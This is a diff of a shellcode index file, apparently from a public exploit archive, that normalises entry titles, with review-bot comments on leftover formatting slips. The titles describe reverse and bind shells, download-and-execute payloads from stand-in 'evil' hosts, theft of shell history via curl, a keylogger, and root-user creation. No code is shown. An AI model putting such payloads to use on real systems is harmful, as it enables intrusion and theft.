-43510,shellcodes/irix/43510.c,"IRIX - Bind (/TCP)Shell (/bin/sh) Shellcode (364 bytes)",2009-01-01,scut/teso,shellcode,irix
+43510,shellcodes/irix/43510.c,"IRIX - Bind (/TCP) Shell (/bin/sh) Shellcode (364 bytes)",2009-01-01,scut/teso,shellcode,irix
 43511,shellcodes/irix/43511.c,"IRIX - execve(/bin/sh) Shellcode (68 bytes)",2009-01-01,scut/teso,shellcode,irix
 43512,shellcodes/irix/43512.c,"IRIX - stdin-read Shellcode (40 bytes)",2009-01-01,scut/teso,shellcode,irix
 43520,shellcodes/arm/43520.c,"Linux/ARM - execve(_/bin/sh__ NULL_ 0) Shellcode (34 bytes)",2017-03-31,dummys,shellcode,arm
-43530,shellcodes/arm/43530.c,"Linux/ARM - Add Map (127.1.1.1 google.lk) In /etc/hosts Shellcode (79 bytes)",2015-03-02,"Osanda Malith Jayathissa",shellcode,arm
-43531,shellcodes/arm/43531.c,"Linux/ARM - chmod( /etc/passwd 0777) Shellcode (39 bytes)",2013-09-04,gunslinger_,shellcode,arm
+43530,shellcodes/arm/43530.c,"Linux/ARM - Add Map (127.1.1.1 google.lk) To /etc/hosts Shellcode (79 bytes)",2015-03-02,"Osanda Malith Jayathissa",shellcode,arm
+43531,shellcodes/arm/43531.c,"Linux/ARM - chmod(/etc/passwd 0777) Shellcode (39 bytes)",2013-09-04,gunslinger_,shellcode,arm
 43532,shellcodes/arm/43532.c,"Linux/ARM - creat(_/root/pwned__ 0777) Shellcode (39 bytes)",2013-09-04,gunslinger_,shellcode,arm
 43533,shellcodes/arm/43533.c,"Linux/ARM - execve(_/bin/sh__ []_ [0 vars]) Shellcode (35 bytes)",2013-09-04,gunslinger_,shellcode,arm
 43534,shellcodes/arm/43534.c,"Linux/ARM - execve(_/bin/sh__NULL_0) Shellcode (31 bytes)",2010-08-31,"Jonathan Salwan",shellcode,arm
@@ -818,14 +818,14 @@ id,file,description,date,author,type,platform 43541,shellcodes/superh_sh4/43541.c,"Linux/SuperH (sh4) - execve(_/bin/sh__ 0_ 0) Shellcode (19 bytes)",2011-06-22,"Florian Gaultier",shellcode,superh_sh4 43542,shellcodes/superh_sh4/43542.c,"Linux/SuperH (sh4) - Bind (31337/TCP) Shell (/bin/sh) Shellcode (132 bytes)",2009-01-01,Dad_,shellcode,superh_sh4 43546,shellcodes/linux_sparc/43546.c,"Linux/SPARC - setreuid(0_0) + execve() Shellcode (72 bytes)",2009-01-01,"Michel Kaempf",shellcode,linux_sparc -43549,shellcodes/linux_x86-64/43549.c,"Linux/x64 - Execute /bin/sh Shellcode (27 bytes)",2009-01-01,Dad_,shellcode,linux_x86-64 +43549,shellcodes/linux_x86-64/43549.c,"Linux/x64 - execve(/bin/sh) Shellcode (27 bytes)",2009-01-01,Dad_,shellcode,linux_x86-64 43550,shellcodes/linux_x86-64/43550.c,"Linux/x64 - Execute /bin/sh Shellcode (24 bytes)",2018-01-13,0x4ndr3,shellcode,linux_x86-64 -43551,shellcodes/linux_x86-64/43551.c,"Linux/x64 - Add Map (127.1.1.1 google.lk) In /etc/hosts Shellcode (110 bytes)",2014-10-29,"Osanda Malith Jayathissa",shellcode,linux_x86-64 -43552,shellcodes/linux_x86-64/43552.c,"Linux/x64 - Add Map (127.1.1.1 google.lk) In /etc/hosts Shellcode (96 bytes)",2018-01-13,0x4ndr3,shellcode,linux_x86-64 +43551,shellcodes/linux_x86-64/43551.c,"Linux/x64 - Add Map (127.1.1.1 google.lk) To /etc/hosts Shellcode (110 bytes)",2014-10-29,"Osanda Malith Jayathissa",shellcode,linux_x86-64 +43552,shellcodes/linux_x86-64/43552.c,"Linux/x64 - Add Map (127.1.1.1 google.lk) To /etc/hosts Shellcode (96 bytes)",2018-01-13,0x4ndr3,shellcode,linux_x86-64 43553,shellcodes/linux_x86-64/43553.c,"Linux/x64 - Flush IPTables Rules (execve(_/sbin/iptables__ [_/sbin/iptables__ _-F_]_ NULL)) Shellcode (43 bytes)",2018-01-13,0x4ndr3,shellcode,linux_x86-64 43554,shellcodes/linux_x86-64/43554.c,"Linux/x64 - Bind (1337/TCP) Shell + Password (pAzzW0rd) + Egghunter Using sys_access() Shellcode (49 bytes)",2009-01-01,Doreth.Z10,shellcode,linux_x86-64 
-43555,shellcodes/linux_x86-64/43555.c,"Linux/x64 - shutdown -h now Shellcode (65 bytes)",2014-06-27,"Osanda Malith Jayathissa",shellcode,linux_x86-64 -43556,shellcodes/linux_x86-64/43556.asm,"Linux/x64 - shutdown -h now Shellcode (64 bytes)",2014-09-14,Keyman,shellcode,linux_x86-64 +43555,shellcodes/linux_x86-64/43555.c,"Linux/x64 - /sbin/shutdown -h now Shellcode (65 bytes)",2014-06-27,"Osanda Malith Jayathissa",shellcode,linux_x86-64 +43556,shellcodes/linux_x86-64/43556.asm,"Linux/x64 - /sbin/shutdown -h now Shellcode (64 bytes)",2014-09-14,Keyman,shellcode,linux_x86-64 43557,shellcodes/linux_x86-64/43557.asm,"Linux/x64 - Read /etc/passwd + Write To /tmp/outfile Shellcode (105 bytes)",2014-09-14,Keyman,shellcode,linux_x86-64 43558,shellcodes/linux_x86-64/43558.asm,"Linux/x64 - Reverse (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (hell) Shellcode (136 bytes)",2014-09-04,Keyman,shellcode,linux_x86-64 43559,shellcodes/linux_x86-64/43559.asm,"Linux/x64 - Bind (4444/TCP) Shell (/bin/sh) + Password (hell) Shellcode (147 bytes)",2014-09-03,Keyman,shellcode,linux_x86-64 
@@ -839,10 +839,10 @@ id,file,description,date,author,type,platform 43951,shellcodes/linux_x86-64/43951.nasm,"Linux/x64 - Bind (4444/TCP) Shell (/bin/sh) + Password (1234567) Shellcode (136 bytes)",2017-11-09,0x4ndr3,shellcode,linux_x86-64 43952,shellcodes/linux_x86-64/43952.nasm,"Linux/x64 - Reverse (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (1234567) Shellcode (104 bytes)",2017-11-11,0x4ndr3,shellcode,linux_x86-64 43953,shellcodes/linux_x86-64/43953.nasm,"Linux/x64 - Egghunter (0xbeefbeef) Shellcode (34 bytes)",2017-11-23,0x4ndr3,shellcode,linux_x86-64 -43954,shellcodes/linux_x86-64/43954.nasm,"Linux/x64 - Custom Encoded XOR + execve(/bin/sh) Shellcode",2017-12-16,0x4ndr3,shellcode,linux_x86-64 -43955,shellcodes/generator/43955.py,"Linux/x64 - Custom Encoded XOR + Polymorphic + execve(/bin/sh) Shellcode (Generator)",2017-12-19,0x4ndr3,shellcode,generator -43956,shellcodes/linux_x86-64/43956.c,"Linux/x64 - Twofish Encoded + DNS (CNAME) Password + execve(/bin/sh) Shellcode",2018-02-02,0x4ndr3,shellcode,linux_x86-64 -46493,shellcodes/linux_x86/46493.c,"Linux/x86 - NOT Encoder / Decoder - execve(/bin/sh) Shellcode (44 bytes)",2019-03-04,"Daniele Votta",shellcode,linux_x86 +43954,shellcodes/linux_x86-64/43954.nasm,"Linux/x64 - execve(/bin/sh) + Custom Encoded XOR Shellcode",2017-12-16,0x4ndr3,shellcode,linux_x86-64 +43955,shellcodes/generator/43955.py,"Linux/x64 - execve(/bin/sh) + Custom Encoded XOR + Polymorphic Shellcode (Generator)",2017-12-19,0x4ndr3,shellcode,generator +43956,shellcodes/linux_x86-64/43956.c,"Linux/x64 - execve(/bin/sh) + Twofish Encoded + DNS (CNAME) Password + Shellcode",2018-02-02,0x4ndr3,shellcode,linux_x86-64 +46493,shellcodes/linux_x86/46493.c,"Linux/x86 - execve(/bin/sh) + NOT Encoder / Decoder Shellcode (44 bytes)",2019-03-04,"Daniele Votta",shellcode,linux_x86 44143,shellcodes/arm/44143.s,"Linux/ARM - Bind (4444/TCP) Shell (/bin/sh) + IP Controlled (192.168.1.190) + Null-Free Shellcode (168 bytes)",2018-02-19,rtmcx,shellcode,arm 
42295,shellcodes/linux_x86/42295.c,"Linux/x86 - Reverse (127.1.1.1:11111/TCP) Shell + Null-Free Shellcode (67 bytes)",2013-01-01,"Geyslan G. Bem",shellcode,linux_x86 41723,shellcodes/linux_x86/41723.c,"Linux/x86 - Reverse (192.168.3.119:54321/TCP) Shell (/bin/bash) Shellcode (110 bytes)",2017-03-24,JR0ch17,shellcode,linux_x86 @@ -873,7 +873,7 @@ id,file,description,date,author,type,platform 43463,shellcodes/linux_x86/43463.nasm,"Linux/x86 - chmod 777 /etc/sudoers Shellcode (36 bytes)",2018-01-04,"Hashim Jawad",shellcode,linux_x86 44321,shellcodes/linux_x86/44321.c,"Linux/x86 - execve(/bin/sh) Shellcode (18 bytes)",2018-03-20,"Anurag Srivastava",shellcode,linux_x86 44334,shellcodes/linux_x86/44334.c,"Linux/x86 - Egghunter + Null-Free Shellcode (11 Bytes)",2018-03-23,"Anurag Srivastava",shellcode,linux_x86 -44445,shellcodes/generator/44445.py,"Linux/x64 - x64 Assembly Shellcode (Generator)",2018-04-11,0x4ndr3,shellcode,generator +44445,shellcodes/generator/44445.py,"Linux/x64 - execve() Assembly Shellcode (Generator)",2018-04-11,0x4ndr3,shellcode,generator 44505,shellcodes/linux_x86/44505.c,"Linux/x86 - Bind (1337/TCP) Shell (/bin/sh) + Null-Free Shellcode (92 bytes)",2018-04-24,"Anurag Srivastava",shellcode,linux_x86 44507,shellcodes/linux_x86/44507.c,"Linux/x86 - Edit /etc/sudoers (ALL ALL=(ALL) NOPASSWD: ALL) For Full Access + Null-Free Shellcode (79 bytes)",2018-04-24,absolomb,shellcode,linux_x86 44508,shellcodes/linux_x86/44508.c,"Linux/x86 - Reverse (127.1.1.1:5555/TCP) Shell Shellcode (73 Bytes)",2018-04-24,"Anurag Srivastava",shellcode,linux_x86 
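Review bot: The new title for 43956 in the `@@ -839,10 +839,10 @@` hunk ends in `Password + Shellcode`, leaving a dangling `+` before the final word. The other three rows reordered in the same hunk (43954, 43955, 46493) end in a plain `... Shellcode`. The description should read `"Linux/x64 - execve(/bin/sh) + Twofish Encoded + DNS (CNAME) Password Shellcode"`. Since these titles are the text an index search matches on, the stray separator is worth fixing in the same normalisation pass.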
@@ -894,7 +894,7 @@ id,file,description,date,author,type,platform
 44811,shellcodes/arm/44811.c,"Linux/ARM - Egghunter (0x50905090) + execve('/bin/sh') Shellcode (32 bytes)",2018-05-31,"Ken Kitahara",shellcode,arm
 46491,shellcodes/linux_x86/46491.c,"Linux/x86 - Flush IPTables Rules (iptables -F) Shellcode (43 bytes)",2019-03-04,"Cameron Brown",shellcode,linux_x86
 44856,shellcodes/arm/44856.c,"Linux/ARM - Egghunter (0x50905090) + execve('/bin/sh') Shellcode (60 bytes)",2018-06-08,rtmcx,shellcode,arm
-44963,shellcodes/linux_x86/44963.c,"Linux/x86 - Execve /bin/cat /etc/passwd Shellcode (37 bytes)",2018-07-02,"Anurag Srivastava",shellcode,linux_x86
+44963,shellcodes/linux_x86/44963.c,"Linux/x86 - execve(/bin/cat /etc/passwd) Shellcode (37 bytes)",2018-07-02,"Anurag Srivastava",shellcode,linux_x86
 44990,shellcodes/linux_x86/44990.c,"Linux/x86 - Kill Process Shellcode (20 bytes)",2018-07-09,"Nathu Nandwani",shellcode,linux_x86
 45029,shellcodes/arm/45029.c,"Linux/ARM - Bind (1234/TCP) Shell (/bin/sh) Shellcode (104 bytes)",2018-07-16,odzhancode,shellcode,arm
 45039,shellcodes/linux_x86-64/45039.c,"Linux/x64 - Reverse (::1:1337/TCP) Shell (/bin/sh) + IPv6 + Password (pwnd) Shellcode (115 bytes)",2018-07-17,"Hashim Jawad",shellcode,linux_x86-64
@@ -905,44 +905,44 @@ id,file,description,date,author,type,platform 45185,shellcodes/linux_x86-64/45185.asm,"Linux/x64 - Add Root User (toor/toor) Shellcode (99 bytes)",2018-08-13,epi,shellcode,linux_x86-64 45287,shellcodes/linux_mips/45287.c,"Linux/MIPS64 - execve(/bin/sh) Shellcode (48 bytes)",2018-08-29,antonio,shellcode,linux_mips 45290,shellcodes/arm/45290.c,"Linux/ARM - execve(_/bin/sh__ [_/bin/sh_]_ NULL) Shellcode (32 Bytes)",2018-08-29,"Ken Kitahara",shellcode,arm -45291,shellcodes/linux_x86/45291.c,"Linux/x86 - Bind (1337/TCP) Shell (/bin/sh) + (Dual IPv4 and IPv6) Shellcode (146 bytes)",2018-08-29,"Kevin Kirsche",shellcode,linux_x86 +45291,shellcodes/linux_x86/45291.c,"Linux/x86 - Bind (1337/TCP) Shell (/bin/sh) + IPv4/6 Shellcode (146 bytes)",2018-08-29,"Kevin Kirsche",shellcode,linux_x86 45292,shellcodes/linux_x86/45292.py,"Linux/x86 - Reverse (fd15:4ba5:5a2b:1002:61b7:23a9:ad3d:5509:1337/TCP) Shell (/bin/sh) + IPv6 Shellcode (Generator) (94 bytes)",2018-08-29,"Kevin Kirsche",shellcode,linux_x86 45293,shellcodes/windows_x86-64/45293.c,"Windows/x64 (10) - WoW64 Egghunter (w00tw00t) Shellcode (50 bytes)",2018-08-29,n30m1nd,shellcode,windows_x86-64 -45308,shellcodes/arm/45308.c,"Linux/ARM - read(0_ buf_ 0xff) stager + execve(_/bin/sh__ NULL_ NULL) Shellcode (28 Bytes)",2018-08-30,"Ken Kitahara",shellcode,arm -45329,shellcodes/arm/45329.c,"Linux/ARM - read(0_ buf_ 0xff) stager + execve(_/bin/sh__ NULL_ NULL) Shellcode (20 Bytes)",2018-09-04,"Ken Kitahara",shellcode,arm +45308,shellcodes/arm/45308.c,"Linux/ARM - execve(_/bin/sh__ NULL_ NULL) + read(0_ buf_ 0xff) Stager Shellcode (28 Bytes)",2018-08-30,"Ken Kitahara",shellcode,arm +45329,shellcodes/arm/45329.c,"Linux/ARM - execve(_/bin/sh__ NULL_ NULL) + read(0_ buf_ 0xff) Stager Shellcode (20 Bytes)",2018-09-04,"Ken Kitahara",shellcode,arm 45529,shellcodes/linux_x86/45529.c,"Linux/x86 - execve(/bin/sh) + NOT/SHIFT-N/XOR-N Encoded Shellcode (50 byes)",2018-10-04,"Pedro Cabral",shellcode,linux_x86 
45415,shellcodes/linux_x86/45415.c,"Linux/x86 - Add Root User (r00t/blank) + Polymorphic Shellcode (103 bytes)",2018-09-14,"Ray Doyle",shellcode,linux_x86 45416,shellcodes/linux_x86/45416.c,"Linux/x86 - Read File (/etc/passwd) + MSF Optimized Shellcode (61 bytes)",2018-09-14,"Ray Doyle",shellcode,linux_x86 -45417,shellcodes/linux_x86/45417.c,"Linux/86 - File Modification (/etc/hosts 127.1.1.1 google.com) + Polymorphic Shellcode (99 bytes)",2018-09-14,"Ray Doyle",shellcode,linux_x86 +45417,shellcodes/linux_x86/45417.c,"Linux/x86 - File Modification (/etc/hosts 127.1.1.1 google.com) + Polymorphic Shellcode (99 bytes)",2018-09-14,"Ray Doyle",shellcode,linux_x86 45418,shellcodes/linux_x86/45418.c,"Linux/x86 - echo _Hello World_ + Random Bytewise XOR + Insertion Encoder Shellcode (54 bytes)",2018-09-14,"Ray Doyle",shellcode,linux_x86 -45426,shellcodes/arm/45426.c,"Linux/ARM - Jump Back Shellcode + execve(_/bin/sh__ NULL_ NULL) Shellcode (4 Bytes)",2018-09-18,"Ken Kitahara",shellcode,arm +45426,shellcodes/arm/45426.c,"Linux/ARM - execve(_/bin/sh__ NULL_ NULL) + Jump Back Shellcode (4 Bytes)",2018-09-18,"Ken Kitahara",shellcode,arm 45441,shellcodes/linux_x86/45441.c,"Linux/x86 - Egghunter (0x50905090) + sigaction() Shellcode (27 bytes)",2018-09-20,"Valerio Brussani",shellcode,linux_x86 45458,shellcodes/arm/45458.c,"Linux/ARM - Egghunter (PWN!) + execve(_/bin/sh__ NULL_ NULL) Shellcode (28 Bytes)",2018-09-24,"Ken Kitahara",shellcode,arm 45459,shellcodes/arm/45459.c,"Linux/ARM - Egghunter (PWN!) 
+ execve(_/bin/sh__ NULL_ NULL) + sigaction() Shellcode (52 Bytes)",2018-09-24,"Ken Kitahara",shellcode,arm 45495,shellcodes/arm/45495.c,"Linux/ARM - Bind (0.0.0.0:4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (92 Bytes)",2018-09-26,"Ken Kitahara",shellcode,arm 45538,shellcodes/linux_x86/45538.txt,"Linux/x86 - execve(/bin/sh) + MMX/ROT13/XOR Shellcode (Encoder/Decoder) (104 bytes)",2018-10-08,"Kartik Durg",shellcode,linux_x86 -45541,shellcodes/linux_mips/45541.c,"Linux/MIPS (Big Endian) - execve(/bin/sh) + Reverse TCP (192.168.2.157/31337) Shellcode (181 bytes)",2018-10-08,cq674350529,shellcode,linux_mips +45541,shellcodes/linux_mips/45541.c,"Linux/MIPS (Big Endian) - execve(/bin/sh) + Reverse (192.168.2.157:31337/TCP) Shellcode (181 bytes)",2018-10-08,cq674350529,shellcode,linux_mips 45669,shellcodes/linux_x86/45669.c,"Linux/x86 - execve(/bin/cat /etc/ssh/sshd_config) Shellcode 44 Bytes",2018-10-24,"Goutham Madhwaraj",shellcode,linux_x86 45743,shellcodes/windows_x86-64/45743.c,"Windows/x64 - Remote (Bind TCP) Keylogger Shellcode (864 bytes) (Generator)",2018-10-30,"Roziul Hasan Khan Shifat",shellcode,windows_x86-64 45821,shellcodes/linux_x86/45821.c,"Linux/x86 - Bind (99999/TCP) NetCat Traditional (/bin/nc) Shell (/bin/bash) Shellcode (58 bytes)",2018-11-13,"Javier Tello",shellcode,linux_x86 -45940,shellcodes/linux_x86/45940.nasm,"Linux/x86 - /usr/bin/head -n99 cat etc/passwd Shellcode (61 Bytes)",2018-12-04,Nelis,shellcode,linux_x86 +45940,shellcodes/linux_x86/45940.nasm,"Linux/x86 - execve(/usr/bin/head -n99 cat etc/passwd) Shellcode (61 Bytes)",2018-12-04,Nelis,shellcode,linux_x86 45943,shellcodes/linux_x86-64/45943.c,"Linux/x64 - Reverse (0.0.0.0:1907/TCP) Shell Shellcode (119 Bytes)",2018-12-04,"Kağan Çapar",shellcode,linux_x86-64 45980,shellcodes/linux_x86/45980.c,"Linux/x86 - Bind (1337/TCP) Ncat (/usr/bin/ncat) Shell (/bin/bash) + Null-Free Shellcode (95 bytes)",2018-12-11,T3jv1l,shellcode,linux_x86 46007,shellcodes/linux_x86-64/46007.c,"Linux/x64 - 
Disable ASLR Security Shellcode (93 Bytes)",2018-12-19,"Kağan Çapar",shellcode,linux_x86-64 46039,shellcodes/linux_x86/46039.c,"Linux/x86 - Kill All Processes Shellcode (14 bytes)",2018-12-24,strider,shellcode,linux_x86 -46103,shellcodes/linux_x86/46103.c,"Linux/x86 - execve(/bin/sh -c) + wget (http://127.0.0.1:8080/evilfile) + chmod 777 + execute Shellcode (119 bytes)",2019-01-09,strider,shellcode,linux_x86 -46123,shellcodes/generator/46123.py,"Windows/x86 - Download With TFTP And Execute Shellcode (51-60 bytes) (Generator)",2019-01-11,"Semen Alexandrovich Lyhin",shellcode,generator +46103,shellcodes/linux_x86/46103.c,"Linux/x86 - execve(/bin/sh -c) + wget (http://127.0.0.1:8080/evilfile) + chmod 777 + Execute Shellcode (119 bytes)",2019-01-09,strider,shellcode,linux_x86 +46123,shellcodes/generator/46123.py,"Windows/x86 (XP Pro SP3) - Download File Via TFTP + Execute Shellcode (51-60 bytes) (Generator)",2019-01-11,"Semen Alexandrovich Lyhin",shellcode,generator 46166,shellcodes/linux_x86/46166.c,"Linux/x86 - Bind (4444/TCP) Shell (/bin/sh) Shellcode (100 bytes)",2019-01-15,"Joao Batista",shellcode,linux_x86 46275,shellcodes/linux_x86/46275.c,"Linux/x86 - execve() - Terminal Calculator (bc) Shellcode (53 bytes)",2019-01-29,"Daniele Votta",shellcode,linux_x86 46256,shellcodes/linux_x86/46256.c,"Linux/x86 - exit(0) Shellcode (5 bytes)",2019-01-28,"Daniele Votta",shellcode,linux_x86 46257,shellcodes/linux_x86/46257.c,"Linux/x86 - Read /etc/passwd Shellcode (58 Bytes) (2)",2019-01-28,"Joao Batista",shellcode,linux_x86 -46258,shellcodes/arm/46258.s,"Linux/ARM - Reverse TCP (192.168.1.124:4321) Shell (/bin/sh) Shellcode (64 bytes)",2019-01-28,"Gokul Babu",shellcode,arm -46281,shellcodes/windows_x86/46281.c,"Windows/x86 - 'msiexec.exe' Download and Execute Shellcode (95 bytes)",2019-01-30,"Kartik Durg",shellcode,windows_x86 +46258,shellcodes/arm/46258.s,"Linux/ARM - Reverse (192.168.1.124:4321/TCP) Shell (/bin/sh) Shellcode (64 bytes)",2019-01-28,"Gokul 
Babu",shellcode,arm +46281,shellcodes/windows_x86/46281.c,"Windows/x86 - Download File (http://192.168.0.13/ms.msi) Via msiexec + Execute Shellcode (95 bytes)",2019-01-30,"Kartik Durg",shellcode,windows_x86 46264,shellcodes/arm/46264.s,"Linux/ARM - Bind TCP (0.0.0.0:4321) Shell (/bin/sh) + Null-Free Shellcode (84 bytes)",2019-01-28,"Gokul Babu",shellcode,arm 46277,shellcodes/linux_x86/46277.c,"Linux/x86 - execve(/bin/sh) + RShift-1 Encoded Shellcode (29 bytes)",2019-01-29,"Joao Batista",shellcode,linux_x86 46302,shellcodes/linux_x86/46302.c,"Linux/x86 - Read /etc/passwd Shellcode (58 Bytes) (3)",2019-02-01,Kiewicz,shellcode,linux_x86 46323,shellcodes/linux_x86/46323.py,"Linux/x86 - Random Insertion Encoder and Decoder Shellcode (Generator)",2019-02-05,"Aditya Chaudhary",shellcode,linux_x86 -46393,shellcodes/macos/46393.c,"Apple macOS - Reverse (::1:4444/TCP) Shell (/bin/sh) +IPv6 Shellcode (119 bytes)",2019-02-18,"Ken Kitahara",shellcode,macos +46393,shellcodes/macos/46393.c,"Apple macOS - Reverse (::1:4444/TCP) Shell (/bin/sh) + IPv6 Shellcode (119 bytes)",2019-02-18,"Ken Kitahara",shellcode,macos 46394,shellcodes/macos/46394.c,"Apple macOS - Bind (4444/TCP) Shell (/bin/sh) + IPv6 Shellcode (129 bytes)",2019-02-18,"Ken Kitahara",shellcode,macos 46395,shellcodes/macos/46395.c,"Apple macOS - Reverse (127.0.0.1:4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (103 bytes)",2019-02-18,"Ken Kitahara",shellcode,macos 46396,shellcodes/macos/46396.c,"Apple macOS - Bind (4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (123 bytes)",2019-02-18,"Ken Kitahara",shellcode,macos 
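Review bot: Row 46264 in the `@@ -905,44 +905,44 @@` hunk is left as `Bind TCP (0.0.0.0:4321) Shell (/bin/sh)`, while the neighbouring 46258 from the same author is rewritten to `Reverse (192.168.1.124:4321/TCP)`, so the pair now uses two different address formats. Following 45495 in the same hunk, the title would be `"Linux/ARM - Bind (0.0.0.0:4321/TCP) Shell (/bin/sh) + Null-Free Shellcode (84 bytes)"`. The context row 45529 also still reads `(50 byes)`, and 45669 has its size outside parentheses (`Shellcode 44 Bytes`). Both would be cheap to fix in the same pass.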
@@ -952,77 +952,77 @@ id,file,description,date,author,type,platform
 46524,shellcodes/linux_x86/46524.c,"Linux/x86 - execve(/bin/sh) + Polymorphic Shellcode (63 bytes)",2019-03-11,"Daniele Votta",shellcode,linux_x86
 46679,shellcodes/generator/46679.nasm,"Linux/x64 - XANAX Encoder Shellcode (127 bytes)",2019-04-09,"Alan Vivona",shellcode,generator
 46680,shellcodes/generator/46680.nasm,"Linux/x64 - XANAX Decoder Shellcode (127 bytes)",2019-04-09,"Alan Vivona",shellcode,generator
-46689,shellcodes/linux_x86/46689.c,"Linux/x86 - Add User (sshd/root) to /etc/passwd Shellcode (149 bytes)",2019-04-12,strider,shellcode,linux_x86
+46689,shellcodes/linux_x86/46689.c,"Linux/x86 - Add User (sshd/root) To /etc/passwd Shellcode (149 bytes)",2019-04-12,strider,shellcode,linux_x86
 46696,shellcodes/generator/46696.py,"Linux/x86 - MMX-PUNPCKLBW Encoder Shellcode (61 bytes)",2019-04-15,"Petr Javorik",shellcode,generator
-46704,shellcodes/linux_x86/46704.txt,"Linux/x86 - cat (.bash_history)+ base64 Encode + curl data (http://localhost:8080) Shellcode (125 bytes)",2019-04-15,strider,shellcode,linux_x86
+46704,shellcodes/linux_x86/46704.txt,"Linux/x86 - cat .bash_history + base64 Encode + cURL (http://localhost:8080) Shellcode (125 bytes)",2019-04-15,strider,shellcode,linux_x86
 46736,shellcodes/arm/46736.txt,"Linux/ARM - Reverse (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (S59!) + Null-Free Shellcode (100 bytes)",2019-04-22,"Alan Vivona",shellcode,arm
 46746,shellcodes/generator/46746.txt,"Linux/x86 - Rabbit Encoder Shellcode (200 bytes)",2019-04-24,"Petr Javorik",shellcode,generator
-46789,shellcodes/generator/46789.txt,"Linux/x86 - Reverse (127.0.0.1:8080/TCP) Shell (/bin/sh) + Generator Shellcode (91 Bytes)",2019-05-03,"Dave Sully",shellcode,generator
+46789,shellcodes/generator/46789.txt,"Linux/x86 - Reverse (127.0.0.1:8080/TCP) Shell (/bin/sh) Shellcode (91 Bytes) (Generator)",2019-05-03,"Dave Sully",shellcode,generator
 46791,shellcodes/linux_x86/46791.c,"Linux/x86 - OpenSSL Encrypt (aes256cbc) Files (test.txt) Shellcode (185 bytes)",2019-05-03,strider,shellcode,linux_x86
 46800,shellcodes/generator/46800.txt,"Linux/x86 - Multiple keys XOR Encoder / Decoder execve(/bin/sh) Shellcode (59 bytes)",2019-05-06,"Xavi Beltran",shellcode,generator
-46801,shellcodes/linux_x86/46801.txt,"Linux/x86 - Shred file (test.txt) Shellcode (72 bytes)",2019-05-06,strider,shellcode,linux_x86
+46801,shellcodes/linux_x86/46801.txt,"Linux/x86 - Shred File (test.txt) Shellcode (72 bytes)",2019-05-06,strider,shellcode,linux_x86
 46809,shellcodes/linux_x86/46809.c,"Linux/x86 - execve(/bin/sh) Shellcode (20 bytes)",2019-05-08,Rajvardhan,shellcode,linux_x86
 46829,shellcodes/linux_x86/46829.c,"Linux/x86 - Flush IPTables Rules (/sbin/iptables -F) Shellcode (43 bytes)",2019-05-13,"Xavi Beltran",shellcode,linux_x86
 46870,shellcodes/linux_x86-64/46870.c,"Linux/x86_64 - Delete File (test.txt) Shellcode (28 bytes)",2019-05-20,"Aron Mihaljevic",shellcode,linux_x86-64
-46907,shellcodes/linux_x86-64/46907.c,"Linux/x64 - Execve(/bin/sh) Shellcode (23 bytes)",2019-05-23,Rajvardhan,shellcode,linux_x86-64
+46907,shellcodes/linux_x86-64/46907.c,"Linux/x64 - execve(/bin/sh) Shellcode (23 bytes)",2019-05-23,Rajvardhan,shellcode,linux_x86-64
 46975,shellcodes/linux_x86-64/46975.c,"Linux/x86_64 - Bind (4444/TCP) Shell (/bin/sh) Shellcode (131 bytes)",2019-06-07,"Aron Mihaljevic",shellcode,linux_x86-64
 46979,shellcodes/linux_x86-64/46979.c,"Linux/x86_64 - Bind (4444/TCP) Shell (/bin/sh) Shellcode (104 bytes)",2019-06-10,"Aron Mihaljevic",shellcode,linux_x86-64
-46994,shellcodes/linux_x86/46994.txt,"Linux/x86 - Reposition + INC encoder with execve(/bin/sh) Shellcode (66 bytes)",2019-06-17,"Jonathan So",shellcode,linux_x86
+46994,shellcodes/linux_x86/46994.txt,"Linux/x86 - execve(/bin/sh) + Reposition + INC Encoder Shellcode (66 bytes)",2019-06-17,"Jonathan So",shellcode,linux_x86
 47008,shellcodes/linux_x86-64/47008.c,"Linux/x86_64 - execve(/bin/sh) Shellcode (22 bytes)",2019-06-18,"Aron Mihaljevic",shellcode,linux_x86-64
 47025,shellcodes/linux_x86-64/47025.c,"Linux/x86_64 - Reverse (0.0.0.0:4444/TCP) Shell (/bin/sh) Shellcode",2019-06-24,"Aron Mihaljevic",shellcode,linux_x86-64
 47040,shellcodes/linux_x86/47040.py,"Linux/x86 - ASCII AND_ SUB_ PUSH_ POPAD Encoder Shellcode",2019-06-27,"Petr Javorik",shellcode,linux_x86
-47041,shellcodes/windows_x86/47041.c,"Windows/x86 - bitsadmin Download and Execute (http://192.168.10.10/evil.exe _c:\evil.exe_) Shellcode (210 Bytes)",2019-06-27,"Joseph McDonagh",shellcode,windows_x86
+47041,shellcodes/windows_x86/47041.c,"Windows/x86 - Download File (http://192.168.10.10/evil.exe _c:\evil.exe_) Via bitsadmin + Execute Shellcode (210 Bytes)",2019-06-27,"Joseph McDonagh",shellcode,windows_x86
 47042,shellcodes/windows_x86/47042.c,"Windows/x86 - Start iexplore.exe (http://192.168.10.10/) Shellcode (191 Bytes)",2019-06-28,"Joseph McDonagh",shellcode,windows_x86
-47043,shellcodes/linux_x86/47043.c,"Linux/x86 - Chmod + Execute (/usr/bin/wget http://192.168.1.93//x) + Hide Output Shellcode (129 bytes)",2019-06-28,LockedByte,shellcode,linux_x86
+47043,shellcodes/linux_x86/47043.c,"Linux/x86 - chmod + execute(/usr/bin/wget http://192.168.1.93//x) + Hide Output Shellcode (129 bytes)",2019-06-28,LockedByte,shellcode,linux_x86
 47048,shellcodes/arm/47048.c,"Linux/ARM64 - execve(_/bin/sh__ NULL_ NULL) Shellcode (40 Bytes)",2019-07-01,"Ken Kitahara",shellcode,arm
 47049,shellcodes/arm/47049.c,"Linux/ARM64 - Bind (4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (164 bytes)",2019-07-01,"Ken Kitahara",shellcode,arm
 47050,shellcodes/arm/47050.c,"Linux/ARM64 - Reverse (127.0.0.1:4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (128 bytes)",2019-07-01,"Ken Kitahara",shellcode,arm
 47051,shellcodes/arm/47051.c,"Linux/ARM64 - Bind (4444/TCP) Shell (/bin/sh) + IPv6 Shellcode (176 bytes)",2019-07-01,"Ken Kitahara",shellcode,arm
